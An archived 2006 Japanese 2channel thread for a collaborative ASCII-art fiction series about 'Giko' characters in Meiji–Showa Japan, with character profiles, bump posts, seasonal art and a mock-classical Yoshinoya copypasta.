5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

@@ 明 治 大 正 昭 和 擬 古 (其の拾弐) ##

1 :( ´∀`)さん:2006/09/28(木) 01:51:55 ID:vUTnq+S80
明治大正昭和と時代を驅け巡り昭和中期には果ててしまつた擬古という一風變はつた猫について談話しませう。
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   <イテーヨシ
 ___( °Д°)  \_____________
(_____ノ
 UU  UU

※この擦れでは歴史的仮名遣ひが推奨されてをります。
  また、基本的にsage進行でお願ひ致します。

∧ ∧
( ゚Д゚)∧
過去刷れは此方
@@ 明 治 大 正 昭 和 擬 古 (其の拾壱) ##
http://aa5.2ch.net/test/read.cgi/mona/1156373036/l50
@@ 明 治 大 正 昭 和 擬 古 (其の拾) ## 
http://aa5.2ch.net/test/read.cgi/mona/1142179951/l50
@@ 明 治 大 正 昭 和 擬 古 (其の九) ##
http://aa5.2ch.net/test/read.cgi/mona/1078591418/l50
@@ 明 治 大 正 昭 和 擬 古 (其の八)@@
http://aa3.2ch.net/test/read.cgi/mona/1049961095/l50
@@ 明 治 大 正 昭 和 擬 古 (其の七) ##
http://aa.2ch.net/test/read.cgi/mona/1036066452/l50
@@ 明 治 大 正 昭 和 擬 古 (其の陸) ##
http://aa.2ch.net/mona/kako/1032/10326/1032699718.html
@@ 明 治 大 正 昭 和 擬 古 (復刻版) ##
http://aa.2ch.net/mona/kako/1026/10263/1026318107.html
@@@大 正 昭 和 擬 古(其の肆)###
http://choco.2ch.net/mona/kako/1008/10080/1008056868.html
@@@ 大 正 昭 和 擬 古 参 ###
http://piza2.2ch.net/mona/kako/998/998787799.html
@@@ 大 正 昭 和 擬 古 弐 ###
http://piza2.2ch.net/mona/kako/992/992207339.html
@@@ 大 正 昭 和 擬 古 ###
http://piza2.2ch.net/mona/kako/989/989652852.html

2 :( ´∀`)さん:2006/09/28(木) 01:57:41 ID:vUTnq+S80
@@ 役立つ「つうる」「さいと」などは此方。 ##

────────────────────────────────────

 ∧ ∧            文學作品は『青空文庫』                   ∧ ∧
  ( °Д°)         ttp://www.aozora.gr.jp/               (°Д° )

圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖
────────────────────────────────────

 ∧ ∧         『旧仮名使い変換スクリプト』                  ∧ ∧
  ( °Д°)      http://isweb31.infoseek.co.jp/novel/qkana/     (°Д° )

圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖
────────────────────────────────────

 ∧ ∧    過去の作品は此方『モナー童話集』様に収録されて居ります    ∧ ∧
  ( °Д°) http://monadowa.s14.xrea.com/taisyo-syowa/index.htm  (°Д° )

圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖圖
────────────────────────────────────

3 :( ´∀`)さん:2006/09/28(木) 01:58:37 ID:vUTnq+S80
 ∧∧
 (*゚ー゚) この擦れの雛型(テムプレヱト)を二三御紹介致します。
 < ilYil~/っ
 〇i__i ヽ
 ^^UU^^

∧ ∧
( ゚Д゚)∧
∩ヽ/||⌒!つ

∧ ∧
ミ ゚Д゚ミ∧
∩ヽ/||⌒!つ
   台詞
――――――――――v――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚ )∧ **. |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         ――――ゝ――――――――――
              台詞


   台詞
―――ヽ――――――――――――――
            台詞
      ――――――y――――――――――――

        | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´∀`) |   (゚Д゚,,)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄

4 :( ´∀`)さん:2006/09/28(木) 01:59:20 ID:vUTnq+S80
登場人物紹介 (【 】内は初出スレッド)

     ∧ ∧
 ___( °Д°)
(_____ノ
 UU  UU
擬古猫 【初代】

このスレの主人公(?)
いまだにスレ冒頭に書いてある以上のことは
明らかになっていない、謎の猫。

  ∧ ∧
  (,,゚Д゚) y━~
  / y~|⊃
〜(_|⊃)
擬古先生 【初代】

東北から上京した文士。(代表作は「逝国」)
結婚はしているがまだ子供はない。
やや怒りっぽいが愛妻家。(恐妻家?)
もちろん臣民の義務たる徴兵に応じ、戦地にも赴いた。
新しもの好き。

  /ノ人ヽ
  (゚ー゚*)
 ~旦y,~)
  |,,,,,,||>
  |  ノゞ
ミヰ 【初代】

擬古先生の奥さん。古風な日本女性を絵に描いたような
良き妻だが、少女のような一面も。子供の頃、父親の
茂名 十郎によって擬古家に預けられ、父亡き後も
そのまま擬古家に引き取られた。

  ∧_∧
 ( ´∀`)
 く  y  >
  ノノ川川
 (__)_)
茂名男 【初代】

擬古先生の書生。食べ物に目がない。のんびりとした性格で、
怒りっぽい擬古先生の歯止め役となることもしばしば。
裕福な家である茂名家の三男だが、本人も周りも特に気にしては
いないようだ。
カフエーで働いている椎子さんを見初め、めでたく許婚同士となった。

5 :( ´∀`)さん:2006/09/28(木) 02:00:34 ID:vUTnq+S80
 ∧∧
 (*゚ー゚)
 < ilYil~/っ
 〇i__i ヽ
 ^^UU^^
椎子 【弐】

フルネームは御前 椎子。カフエーで働き、母一人子一人の家計を
助けている。流行りのモダンガアルで普段でも洋装。可憐な美しい娘。
働いている店の名は「カフエー・ノスタルヂヤ」。


  ∧_∧
 <丶`∀´>
<   y  ゝ
  |=====|
 〈_フ__フ
仁太 【弐】

半島の京城から来た青年。新聞社の校正係として働いており、
日本語にも堪能。実は祖国の独立運動に関係していたが、
運動が露見し、仲間はすべて逮捕され獄死。助かったのは
その場にいなかった仁太だけであった。
この秘密を知っているのは擬古先生だけである。
椎子さんに片思いしている。


┏━━━━━━━┓
┃   ___________.   ┃
┃   ヽ=☆=ノ   ┃
┃   (゚Д゚(ヾ.   ┃
┃  <.| 。 |./   ┃
┃   | 。 |〜.  .┃
┃.   ∪∪    ┃
┗━━━━━━━┛
擬古次郎 【初代】

擬古先生の弟。子供の頃からの望み通り軍人になり、戦地にて
名誉の戦死を遂げた。

6 :( ´∀`)さん:2006/09/28(木) 02:01:17 ID:vUTnq+S80
  ∧ ∧
 (*゚∀゚)
 < Y >
 ( /つ)
通之助 【其の八】

擬古先生の末の弟。子供の頃からの望み通り大工になり、結婚して
子供二人をもうける。家庭は破天荒ながらおおむね平和であるようだ。

  ∧∧  ∧ ∧
 (*゚∀゚)  (,*゚∀)
〜(,__) 〜(,__)
ツウ子・通太郎 【其の八】

通之助の子供。双子。
性別は違うが、見分けがつかない程そっくり。

  ∧ ∧ ∬∬
  ( *゚A゚ 旦旦
  (っyっ ̄ ̄ ̄
 [||,,,,,,,,,|
  U~U
濃子 【其の八】

通之助の奥さん。怪力の持ち主で、時々感激のあまり
夫を力一杯抱きしめては気絶させる。
しかし夫婦仲は良い。

7 :( ´∀`)さん:2006/09/28(木) 02:03:10 ID:vUTnq+S80
  ∧_∧
 ( ´_ゝ`)
 (o.{胤} )
 ■| | |
 ( ̄.) ̄)
浮雲 【初代】

出版社「厨房舎」の編集者で、擬古先生の担当。
作品に関する彼の容赦ないコメントで、擬古先生がよく鬱になっている。
どんな原稿を見ても第一声は「ふうん。」

 /ノ人ヽ
 j(゚ー゚)ι
 |UU|
 ノ_□_|
  UU
厨房舎の女史 【弐】

名前が明らかになっていない、厨房舎の女性編集者。
茂名男にダブルデートのだしにされたのがきっかけで、
茂名男の友人のぃょぅといい雰囲気になる。

.♪∧∧
  (=゚ω゚) O~~
 <i...V...i>
 ./__|___|
ぃょぅ 【弐】

茂名男の友人。クロケット(コロッケ)が好物。

∧ ∧
ミ ゚Д゚ミ∧
∩ヽ/||⌒!つ
房擬古 【初代】

茂名男の母方(訃沙家)の親戚。
其の八で擬古先生と茂名男が喧嘩する原因になったが
責任を感じて、二人が仲直りするきっかけを作った。
しかし謝ってはいないらしい…。

8 :( ´∀`)さん:2006/09/28(木) 02:04:29 ID:vUTnq+S80
  _______________
  |                      |~~~~~~|
  |  →" ./  ┼" サ 麗 秀 味 佳 |   .|
  |  ー  ん'  .│こ 早. 演 自 作 自...|____|
  iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|iiiiiiiiiiiii|
  ┃ | . .    \ダンゴ!ウマイヨ!イイ!/┃    |
  ┃ |  o.o.o.o.o  (・∀・ ) ?   ┃    |
  ┃ | o.o.o.o.o. ⊂l/ У⊂l )?   , ┃_  |
  ┃´ ̄========= ̄草團子8錢 ̄  ┃__|
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|    |
  |                        |    |
公園の団子屋 【初代】

ジエンの営む(゚д゚)ウマーな草団子屋。
初登場の時には、あまりの美味さに擬古先生が食べ過ぎて
お腹を壊したり、其の八で茂名男と先生が仲直りするきっかけに
使われたりと、回数は多くないが印象に残る登場が多い。
が、そんなことにはおかまいなく、彼は今日も団子を売る。

|   堂 省 四 の 本      |
|_______________|


|||||||||| |        | ||||||||||||||||||||
===        | ||||||  ∩∩  彡
|||||||||| |            (´ー`)/
冂冂冂         _□ (   つ
□□□         |≡≡≡≡≡≡
 ̄ ̄ ̄|        | ̄ ̄ ̄ ̄ ̄ ̄
本屋の店主 【初代】

擬古先生がよく行く本屋の主人、「ご隠居」と呼ばれている。

9 :( ´∀`)さん:2006/09/28(木) 02:05:12 ID:vUTnq+S80
    /⌒ヽ
   ⊂ ̄ ̄ ̄⊃ ζ
   ( ´∀`)―┛
   ( ) U ( つ    ∧ ∧  ナヤ
   [[[[|]]]]]      (´ー`)_/|
   (__)_)      UU UU
宮澤賢治 【弐】

其の弐で賢治の友人(?)として登場したが、
復刻版(五代目スレ)の「疾中」で宮澤賢治本人として定着した。
ふらりと現れてはマタアリと会話して去っていく。

ノノ人ヾ)          ∧_∧ 彡三ミ
( ´∀`) 日M]0m__ (ハ○  ) (-Д-)  ζ
< つ v |)  |____( /   |) < ヽ/ y━
(_⌒|フ)   |   |   (   _ノ (__)〜
| | | ひ| |   .|   |   |.━┳━  | | | | | |
| | .| | | |   |   |  (_).┃_)   | | | | | |
太宰治 【弐】 坂口安吾 【弐】 芥川龍之介 【初代】

云わずと知れた文豪。
このスレでは擬古先生の同輩。

  ∧∧
  (,,゚ω゚)
  く i y u>
  /_/l_|┃
   .U O┃
江戸川乱歩 【其の七】

云わずと(略)探偵・怪奇小説の大家。
余談だが、彼のペンネームはアメリカの怪奇小説作家
「エドガー・アラン・ポオ」をもじったもの。

10 :( ´∀`)さん:2006/09/28(木) 02:07:48 ID:w/FrK9wQ0
  ,__
 B■∧ /
  (,,゚Д゚) /
   |   つ
   |  |
 〜|  |
   ∪∪
擬古教授 【参】

擬古先生の知り合いで帝大の教授。
過激な授業が多く不敬罪で逮捕されたことがある。
(他スレからの出張です、念の為)

    _、_
  (  ,_ノ`)y━・~~
  < ! y   >
_∧_/~~ ~ノ
|_| し| ̄ ̄ ̄
澁澤殿 【其の八】

擬古先生の知り合い、愛煙家。
口癖は「やれやれだぜ」。

  /⌒\
  (    )
  |   |
  |   |
  ( ・∀・)
  <  y >
  (_)_)
魔羅山固威先生 【其の七】

上州出身、代表作は「布団」。

      ○
      |├───-─┐
      |││ /  / │
      |│⌒ヽ /  │
      |│朝 ) ──│
      |├────-┘
    ∧_∧
    (-@∀@)
  φ⊂  朝 )
    | | |
    (__)_)
朝日記者(仮称) 【其の陸】

朝日新聞の記者。
擬古先生を東洋日報から朝日新聞に引き抜こうと狙っている。

11 :( ´∀`)さん:2006/09/28(木) 02:08:25 ID:w/FrK9wQ0
  ,__
 B■∧ /
  (,,゚Д゚) /
   |   つ
   |  |
 〜|  |
   ∪∪
擬古教授 【参】

擬古先生の知り合いで帝大の教授。
過激な授業が多く不敬罪で逮捕されたことがある。
(他スレからの出張です、念の為)

    _、_
  (  ,_ノ`)y━・~~
  < ! y   >
_∧_/~~ ~ノ
|_| し| ̄ ̄ ̄
澁澤殿 【其の八】

擬古先生の知り合い、愛煙家。
口癖は「やれやれだぜ」。

  /⌒\
  (    )
  |   |
  |   |
  ( ・∀・)
  <  y >
  (_)_)
魔羅山固威先生 【其の七】

上州出身、代表作は「布団」。

      ○
      |├───-─┐
      |││ /  / │
      |│⌒ヽ /  │
      |│朝 ) ──│
      |├────-┘
    ∧_∧
    (-@∀@)
  φ⊂  朝 )
    | | |
    (__)_)
朝日記者(仮称) 【其の陸】

朝日新聞の記者。
擬古先生を東洋日報から朝日新聞に引き抜こうと狙っている。

12 :( ´∀`)さん:2006/09/28(木) 02:09:24 ID:w/FrK9wQ0
重複申し訳御座いません

13 :( ´∀`)さん:2006/09/28(木) 02:17:26 ID:w/FrK9wQ0
私、マタアリとした、この刷れが大好きで、思はず新しい刷れを
立てさせて頂きました。今度こそ、長續きします樣に・・・・・・

    ∧ ∧
    (,,゚Д゚)
   <φ y >
 ┳┯┯┯┯┯┳
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

14 :( ´∀`)さん:2006/09/28(木) 02:26:23 ID:w/FrK9wQ0
百奇縁◆cP100kIWHg殿、( °Д°) 殿、枕流 ◆FiRniTeg 殿、ナイト名無し殿、
によ ◆NYox1Pq殿、内田百闢a、非才 ◆SINNrsos 殿、
   ∧_∧
 m(_ _)m殿、ノスタルヂヤ ◆eaXD6pa7bM殿、 ◆6kST1IibzY 殿
温泉卵 ◆3EggUq7vvU 殿・・・
たくさんの素晴らしき職人殿の技でこの擦れは潤つてをります。
この場を借りて感謝いたします。

15 :( ´∀`)さん:2006/09/28(木) 02:36:20 ID:Rz61iegi0
                                   ∧_∧
                                  (´∀`* )
                 ∧_∧            O ̄ヽy//  ̄O
               ,,___( ・∀・)          |  |=ロ==|  :|
              O    ヽy // \.         ヾ/    ヽノ
              |    |  //   \.           |___ヽ____i::::::::::::::::
              |__ハ | |    |           ::::::::::::::::
                 /=ロ=|__ノ
                /       ヾ
                |___ヽ_______ノ:
                 ::::::::::::::::::::::::::::::::

16 :( ´∀`)さん:2006/09/28(木) 12:52:19 ID:oI5Ndq7C0
即死回避

17 :( ´∀`)さん:2006/09/28(木) 14:03:54 ID:RvWrEOfy0
即死回避

18 :( ´∀`)さん:2006/09/28(木) 14:13:01 ID:nH/QEKu70
即死回避

19 :( ´∀`)さん:2006/09/28(木) 14:41:31 ID:gm4DXq8z0
即死回避

20 :( ´∀`)さん:2006/09/28(木) 14:47:42 ID:cerka/By0
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   < 即死回避
 ___( °Д°)  \_____________
(_____ノ
 UU  UU

21 :( ´∀`)さん:2006/09/28(木) 14:49:51 ID:cerka/By0
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   < 即死回避
 ___( °Д°)  \_____________
(_____ノ
 UU  UU

22 :( ´∀`)さん:2006/09/28(木) 14:50:46 ID:cerka/By0
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   < 即死回避
 ___( °Д°)  \_____________
(_____ノ
 UU  UU

23 :( ´∀`)さん:2006/09/28(木) 14:52:14 ID:cerka/By0
連投で申し訳御座いません。ところで、

>投稿者は掲示板運営者が指定する第三者に対して、一切の権利(第三者に対して
>再許諾する権利を含みます)を許諾しないことを承諾します。

これはどういう意味なのでせうか

24 :( ´∀`)さん:2006/09/28(木) 15:00:06 ID:RRFIBS9X0
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   < 即死回避
 ___( °Д°)  \_____________
(_____ノ
 UU  UU

25 :( ´∀`)さん:2006/09/28(木) 15:17:08 ID:jFyNqBHO0
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   < 即死回避
 ___( °Д°)  \_____________
(_____ノ
 UU  UU

26 :( ´∀`)さん:2006/09/28(木) 15:27:19 ID:jFyNqBHO0
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   < 即死回避
 ___( °Д°)  \_____________
(_____ノ
 UU  UU

27 :( ´∀`)さん:2006/09/28(木) 15:42:12 ID:bmv+DPSo0
即死回避

28 :( ´∀`)さん:2006/09/28(木) 15:47:06 ID:rVhDxXt60
即死回避

29 :( ´∀`)さん:2006/09/28(木) 15:51:10 ID:3uCHEuP30
                                   ∧_∧
                                  (´∀`* )
                 ∧_∧            O ̄ヽy//  ̄O
               ,,___( ・∀・)          |  |=ロ==|  :|
              O    ヽy // \.         ヾ/    ヽノ
              |    |  //   \.           |___ヽ____i::::::::::::::::
              |__ハ | |    |           ::::::::::::::::
                 /=ロ=|__ノ
                /       ヾ
                |___ヽ_______ノ:
                 ::::::::::::::::::::::::::::::::

30 :( ´∀`)さん:2006/09/28(木) 15:51:50 ID:ybsdhsY+0
即死回避

31 :( ´∀`)さん :2006/09/28(木) 15:52:21 ID:LFZ5Kjmj0
http://pya.cc/pyaimg/iiwaru.php?ppid=ZZhp3xZHUjLpE&cid=16107&fl=1

32 :( ´∀`)さん:2006/09/28(木) 22:54:18 ID:dCwJRHXp0
           __
        , ‐' ´ Z  ``‐、             / ̄:三}
.     /,. -─‐- 、.   ヽ        /   ,.=j
 _,.:_'______ヽ、 .!       ./   _,ノ
  `‐、{ へ  '゙⌒ `!~ヽ. !     /{.  /
    `! し゚  ( ゚j `v‐冫   , '::::::::ヽ、/     そんなことより野球しようぜ!
.    {.l   '⌒      ゙ 6',!   / :::::::::::::::/ __
.     〈  < ´ ̄,フ  .ノー'_ , ‐'´::::::::::::::;/ (_ノ)‐-、
.      ヽ.、 ` ‐", ‐´‐:ラ ':::::::::::::::: ;∠.   ヽ_}  ゙ヽ
        ,.r` "´  /:::::::::::::::::::ィ´  `ゝ  !、  /
     /       / :::::::::::::::: ; '´   /´\ /   r'\
.     i      ! ::::::::::::::/ 仏 | .!::::::::/ヽ、.._!ヽ. ヽ、
     {      {:::::::::::;:イ /   ‖i:::::::/:::::::::::::/  \
.      ヽ       ヽ,.ァ‐'´ /ヽ 二 ,/`ヽ、::::::::: /


33 :( ´∀`)さん:2006/09/29(金) 17:22:45 ID:2EwiJJkf0
>>32殿
http://ja.wikipedia.org/wiki/%E9%87%8E%E7%90%83#.E9.87.8E.E7.90.83.E3.81.A8.E3.81.84.E3.81.86.E8.A8.80.E8.91.89.E3.81.AE.E8.AA.9E.E6.BA.90

34 :( ´∀`)さん:2006/09/29(金) 21:50:38 ID:XIxk1HE/0


35 :( ´∀`)さん:2006/09/30(土) 01:05:25 ID:ROMMgFRT0
        | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´∀`) |   (゚Д゚,,)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄

36 :( ´∀`)さん:2006/09/30(土) 02:03:11 ID:vAIY7QT20
                                             .゛:' :+:. .
                                    . : : 、ッミン⌒ミッo⌒ミッソ
       l⌒i _                         . :: :ミッミoッ⌒ッミoミッ⌒くo
     ┌(#))-┐ :: ̄`ヽz..,,_                     . : :ミッoミッミソッソッミッミ
  / ̄,r'´⌒ヾ:,^/ ̄|;;;:;|ll.|l.llll ーーーーー;;‐-------------‐;;ーーー: : : i :::!::::l:::l:::::!:::::!::::::
  |;;;::〔_|  ¢. |||. /~''=| ‖ |      ;;ッ゙: : : : . . . . . . : : ;;゙
  |;;:: 人.,,   ノ;:| |≧フ|_,,!.-''"    ,,ツ". . . : . .: . : .: .: . : .ヾ,,
  |;:::庄兀巫兀庄|_//,-''"    、;;ッ゙. . . . . . . : . : : : . . : .: .: . .゙ヾ,,
 {二二二二二二}}フ)       ,;;ソ. . : .: .: . . . . .       : .: .:. : ミ
   ヘテ合氏ァ/        ,,ツ: : : :         .: .. . . .: : : : : : : : :^ヽ;;
  __/__ /_        イ. . . . .      . . . . . . . : : : . .. . :.: : : : .゙-;;、
 _/______/__        ゙i: : : :            : : : : : : : :. . . . . . . . . . . ゙シ;;、
/________/__        ゙ゞ. : : : . . : ..: .:. ... . .: : : : : :              : : : : ~ヾ,,
       /          "゙丶: : : : : : : . . . . . . : : : . . : ..: .:. .. : .: .:. :. : . : . : . : .゙丶

37 :( ´∀`)さん:2006/09/30(土) 02:37:55 ID:vAIY7QT20
  / ̄ノ\   /
 |  τ  <  ♪あーかーいー リンーゴーに
 \_ヽ/   \
   ‖          
| ̄◎ ̄|      
|◎ ◎ |      
 ̄ ̄ ̄ ̄ ̄ ̄

38 :( ´∀`)さん:2006/09/30(土) 05:20:41 ID:eEATaSTs0
早晩繪繪職人樣の御光臨を期待致します

39 :あぼーん:あぼーん
あぼーん

40 :( ´∀`)さん:2006/09/30(土) 10:39:14 ID:p4WRNjg30
   /⌒\
  (;;;______,,,)  このスレに松茸が生えたようです
   丿 !
   (__,,ノ

41 :( ´∀`)さん:2006/09/30(土) 15:41:43 ID:+jGqoFU30
   
        秋だな
   ___  _________/
        ∨          ||
       ∧ ∧   /ノ人ヽ ||
       ( ゚Д゚)   (゚ー゚*) ||о__
       < |=| >━┳(/  | ||###
       ( /つ)  ||(  )⊃||###
      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   _______∧______
                       \
    土瓶蒸か松茸御飯に致しますか
    それとも七輪でさつと炙つて
    かぼす醤油で召し上がります?
 

 ※昔は、季節ものだがどつさり採れたので庶民の食べ物であつたそうな・・・>松茸

42 :( ´∀`)さん:2006/10/01(日) 19:32:07 ID:WT0Ji/QL0
>>41殿
風流でございますな

43 :( ´∀`)さん:2006/10/01(日) 22:55:00 ID:/jGDx7U00
職人樣御光臨きぼん也

44 :( ´∀`)さん:2006/10/02(月) 02:01:25 ID:2Sfteobu0
       ,....、⊥,....、
     /´/⌒l⌒ヽ`ヽ∧∧      もうすぐ万聖節
  ∧/Y´ / ̄ ̄ ̄ヽ. (,,゚Д゚)      
 (,,゚Д|  | ∧∧   | | ̄lつつ     /l//l/l
  | つ[l. |ξ゚ー゚)    |∠ノーn\\__〆〆 ´`\
〜|ノヽヽ._ ̄: ̄ ̄ ̄: ̄ノ匚|JJヽ>ー|--|---‐メ、゚_゚)
  U J__/、| ,ゝ__,、__,、:_./、|,ゝ匚ニニニニニコ .〈コ  
   ̄\|‐*‐)─*-)|‐*‐)*-)〉// /`ー、ヽ
      ヽ、|_ン ヽ、|_ン ヽ、|_ン 、.|_ン〈/〈/ヽ〉 ヽ〉ヽ〉
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

45 :あぼーん:あぼーん
あぼーん

46 :( ´∀`)さん:2006/10/03(火) 15:09:33 ID:/qU6Y6F90
より多くの人々に閲覽して頂くべく、上げさせて頂きます。ご容赦下さい

47 :( ´∀`)さん:2006/10/03(火) 22:10:34 ID:YOviCTVj0

おや?のまネコのようすが…

  Λ_Λ
  ( * ゚w゚)
  (    )
  | | |
  (__)_)

のまネコ は ノマッチョ にしんかした!

                              ⊂、⌒y ー_っ
                                 T   「
                                 |   |
                                |   |
                    ∧∧        /     |
                   (* ゚w゚)      |     |
                   /   ヽ       ヽ     |
                  /     \   / ̄    |
                 /        |  /  ┘└ ヽ´
               /          `ヽ  ┐┌ |
          / ̄ ̄  、     、 ,     、    ノ
       / ̄ ̄ ヽ    l   、_         `   /
      /                 ヽ   ̄ \  /
    ,-´   \    ├- ´        |     |/
   (      ヽ   ノ  ヽ \    八   ノ
    \     |ー ´\     ` ー ´人`  /
      \    \   ヽ、     / ´ ,、ヽ/
       \    `ーっ  \   /    ノ
         `ー┐   ノ    ヽ      〈
           └一´   /   \  /ヽ
                 /        ↓ |
                 |       | |
                 ヘ       〈  /
                /        ||
                |   |      l /
                \       //
                 ヽ ヽ  ノ |
                 ノ  `ー´l /
                |     ||
                |    | |
                  \   |  |
                  |   | |
                   |   |  |
                  /  〈   \
                 ノ    ヽヘ、_`つ
                ( (_(_(_人__)

48 :( ´∀`)さん:2006/10/04(水) 11:54:59 ID:MnAJSc8u0
     彡三ミ   
     (-Д-)  ζ   
    < ヽ/ y━    
   〜(__)       

49 :あぼーん:あぼーん
あぼーん

50 :( ´∀`)さん:2006/10/04(水) 18:58:04 ID:+majVqHF0
世のなかいと煩わし

       | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´∀`) |   (゚Д゚,,)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄


51 :過去擦れ拠り:2006/10/05(木) 00:27:00 ID:b0kZgLrC0
其はさて擱き、聴いて被下度候
私事ながら先般、吉野家へ往きけり。嗚呼、吉野家。
なれど、なでう事にかあらむ、混み入りたる事蟷螂卵隗より孵するが如し、
吾人に前後して入り来る者、皆座する事能はざる也。
げに怪しく覚え、恥かしながら右顧左眄して様子を覗ふ事数瞬、幕に大書されたる惹句には百五十円引キとあり。
嗚呼愚かなる哉、厄介千万也。
小人百五十円引きにて遠路吉野家に到す、豎子と云ふ可き也。
百五十円、書くにも穢らはしけれど百五十円。
其中、子弟婦女帯同せし輩も散見せらる。家中四人で吉野家へ至る、厚顔無恥の所業也。
又、「呵呵。愉快至極。一家の柱たる者、牛丼の特盛など食らへずになんとするか」
などと云へる愚物あり。見るに堪へず。
爾等、百五十円遣はすによって座を空けよ。
抑、吉野家は殺伐としたものなり。
呉越同舟、凹字の卓子に相対せる者同志、いつ何時厨房の露と消えても可笑しくない、
弱肉強食、その旨を諒として来店すべきなり。婦女若輩は数ふ不可也。
爾後、やうやう座に就けりと安堵せしが、隣席なる下郎、傲然として曰く、大盛つゆだくで、と。
吾人、鉄腸の鉛湯を熔かすが如き怒気に総身震へり。
下郎、天下天道を畏れざる事甚だし。ボケが。
傲岸不遜の軽輩、何ぞつゆだくで食らはんか。
爾は本意誠心よりつゆだくを欲するかと問いたし。問い詰めたし。
半刻ほど石を抱かせて問い詰めたし。
吉野家通人が世に曰く、通家の食法はねぎだく、是ノミ。
大盛り葱だくギョク。これぞ通人行家生命の糧なり。
然し乍ら、これを誂ふと爾後給仕より注視さるる事甚大、両刃の剣と云へり。
素人に薦むるは甚だ遺憾なり。
まァ爾ら町人は、二八蕎麦でも食つて居るが宜しかろうとここに陳ぶる者也。

52 :あぼーん:あぼーん
あぼーん

53 :( ´∀`)さん:2006/10/08(日) 14:44:52 ID:B2QtDW990
保全

54 :あぼーん:あぼーん
あぼーん

55 :( ´∀`)さん:2006/10/12(木) 19:27:32 ID:Y3yvhfAq0
むむむ

56 :あぼーん:あぼーん
あぼーん

57 ::2006/10/13(金) 06:14:31 ID:VhLfhkZN0


58 :( ´∀`)さん:2006/10/13(金) 14:24:45 ID:3zl+KWex0
>>55
(・∀・)むむむ殿、ご無沙汰致してをります

59 :( ´∀`)さん:2006/10/14(土) 10:47:32 ID:bC8V3Mt/0
      ∧ ∧
     (゚Д゚ ,,):. _ ミヰや、そろそろ寝ようか。
    r'⌒と、j   ヽ
    ノ ,.ィ'  `ヽ. /
  /       i!./
 (_,.         //
 く.,_`^''ー-、_,,..ノ/

60 :( ´∀`)さん:2006/10/14(土) 11:14:24 ID:s1H1/jc10
  /ノ人ヽ
  (*゚ー゚)   マア?貴方つたら
  (~ y,)    どふなさつたの
 <|,,,,,,,,|   まだお昼まへですよ
  ノ  |


61 : ◆1IMMMMMMMM :2006/10/15(日) 01:58:44 ID:XYrGQB5T0
>>58
多忙と體調不良とで久しく留守をゐたしてをり候へり。
やはり此處は落ち着き候。

むゝむ。

  ∧ ∧
  (,,゚Д゚) y━~
  / y~|⊃
〜(_|⊃)

62 :あぼーん:あぼーん
あぼーん

63 :( ´∀`)さん:2006/10/17(火) 05:17:04 ID:J7ivVbr00
         (⌒Y⌒Y⌒)
          \__/__  
          /     \\  
         / \   / \ \ ) 
          | (・)  (・)   \ ⌒ )
        |  ⊂      9)  )  <このスレは私が乗っ取らせてもらう。
        |  ___   | )      
         \ \_/   /          
          \____/|            
      _,./| ヽ`ー--‐ _´.. ‐''´   ./  \、
-‐ '''"  ̄ /  :|   ,ゝ=<      /    | `'''‐- 、.._
     /   !./l;';';';';';';\    ./    │   _
      _,> '´|l. ミ:ゝ、;';';_/,´\  ./|._ , --、 | i´!⌒!l  r:,=i
.     |     |:.l. /';';';';';|=  ヽ/:.| .|l⌒l lニ._ | ゙ー=':| |. L._」
      l.    |:.:.l./';';';';';';'!    /:.:.| i´|.ー‐' | / |    |. !   l
.     l.   |:.:.:.!';';';';';';';'|  /:.:.:.:!.|"'|.   l'  │-==:|. ! ==l   ,. -‐;
